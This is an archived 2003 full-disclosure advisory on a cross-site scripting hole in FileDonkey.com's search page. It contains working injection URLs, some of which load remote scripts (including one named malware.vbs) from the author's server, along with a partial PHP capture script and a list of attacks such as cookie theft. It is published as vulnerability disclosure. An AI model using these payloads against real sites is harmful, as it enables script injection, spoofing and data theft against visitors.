[<prev] [next>] [day] [month] [year] [list]
Message-ID: <003a01c390e0$e3d95110$050010ac@Estila>
Date: Sun, 12 Oct 2003 18:49:59 +0200
From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh@...g-security.com>
To: "Full-Disclosure" <full-disclosure@...ts.netsys.com>
Cc: "BUGTRAQ" <bugtraq@...urityfocus.com>, <webmaster@...edonkey.com>
Subject: FileDonkey.com Cross Site Scripting
FileDonkey.com Cross Site Scripting
------
WEBSITE: File Donkey
DOMAIN: www.filedonkey.com
RISK: 7
OWNERS STATUS: webmaster@...edonkey.com [ warned same time as security
lists ]
---------------------
--- DESCRIPTION ---
FileDonkey.com is the only one web search supported engine by P2P clients
like eMule , xMule , etc.
FileDonkey is a world wide used website for found the files that you want in
the eDonkey networks (P2P).
---------------------------------------------
|SECURITY HOLES FOUND and PROOFS OF CONCEPT:|
---------------------------------------------
I was making some tests in the FileDonkey website but i didn't remember the
search engine,
search engines are the first systems affected by Cross Site Scripting holes
because , normally ,
they have an insufficient input validation control and they make outputs (
search results )
without checking for dangerous codes , this can be exploited easily with
some lines of PHP
Code and a little knowledge of PHP and Java Script.
---------------------------------------------
| CROSS SITE SCRIPTING HOLES FOUND |
---------------------------------------------
Located in the Search engine , currently using a script with HTML extension
,
search.html .
This script basically uses 5 variables:
pattern=[KEYWORDS]
min_size=[FILE MIN SIZE]
max_size=[FILE MAX SIZE]
scope=[FILE TYPE]
submit=[YOUR SUBMIT BUTTON CODE]
But only one is needed : pattern=
You must include the keywords for the anted file , and , walla ! f the file
is available , it provides you
a nice list of results ( ed2k links ).
The keywords sent will be sown in ( if there are no available files ) :
No files found for pattern 'NoSecureRootGroupSecurityResearch'.
Ok , it seems not vulnerable but , wait a moment , the keywords are in the
form field , and , we know
that a form field always ends with a "> , let's try!
.....We send the request in POST Mode...Or use this url:
http://www.filedonkey.com/search.html?pattern="><script>alert('xD .- Shields
Down ! -. xD');</script>
And we get...
-----JavaScript Application-----
| |
| xD .- Shields Down ! -. xD |
| |
|------------------------------|
The script was successfully executed in the client side .
Fantastic for attackers ( not me ;-).
We can try more things , and , of course , my loved PHP perfomance:
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
| CODE FOR THE COMMON XSS TESTING TASKS |
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
/\ cut from here /\
<?php
// ----------------------------------
// XSS TESTING SCRIPT
// NO SECURE ROOT GROUP SECURITY RESEARCH
// BY LORENZO HERNANDEZ GARCIA-HIERRO
// * NOT FULL VERSION *
// ----------------------------------
$domain = "FileDonkey.com/Other";
$member = "Lorenzo Hernandez Garcia-Hierro";
$referer = getenv("HTTP_REFERER");
$data = getenv("QUERY_STRING");
$xss = strip_tags($data);
echo "$xss";
?>
/\ xss-testing.php END ! /\
Please note that i removed lots of lines of the code for prevent bad uses of
this.
A full version is running under
http://test-zone.nsrg-security.com/xss/?XSS_TEST
it has
-- THE REAL EXPLOITATION --
Now we start to exploit the xss hole :
*-.Possible attacks:
1.- Including malicious scripts for execute them in the Client side.
2.- Try to stole cookies data ( no cookies are given in FileDonkey )
3.- Try to connect to malicious sites trough the Microsoft.XMLHTTP .
4.- Try to use known vulnerabilities for stole other domains data.
SOME PROOFS OF CONCEPTS:
________________________
A script that i developed for change some web page stuff ( spoofing ) :
http://www.filedonkey.com/search.html?pattern="><script%20src=http://test-zone.nsrg-security.com/xss/spoofing.js></script>
A Georgi Guninski Script ( shows a blue screen that spoofs all the screen:
http://www.filedonkey.com/search.html?pattern="><script%20src=http://test-zone.nsrg-security.com/xss/blue.js></script>
Replace Windows Media Player executable with a non dangerous file that sows
a dialog with some nice stuff of the NSRGroup:
http://www.filedonkey.com/search.html?pattern="><script%20src=http://test-zone.nsrg-security.com/xss/malware.vbs></script>
The XSS standard testing script ( NSRGroup XSS-TST-STANDARD )
http://test-zone.nsrg-security.com/xss/?XSS-TST-STANDARD
*//*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/
* REFERENCES -> ONLINE
/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/
http://advisories.nsrg-security.com/FileDonkey.com-XSS
-----------
| CONTACT |
-----------
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->Security Consultant
__________________________________
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
No Secure Root Group Security Research Team
http://www.nsrg-security.com
______________________
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists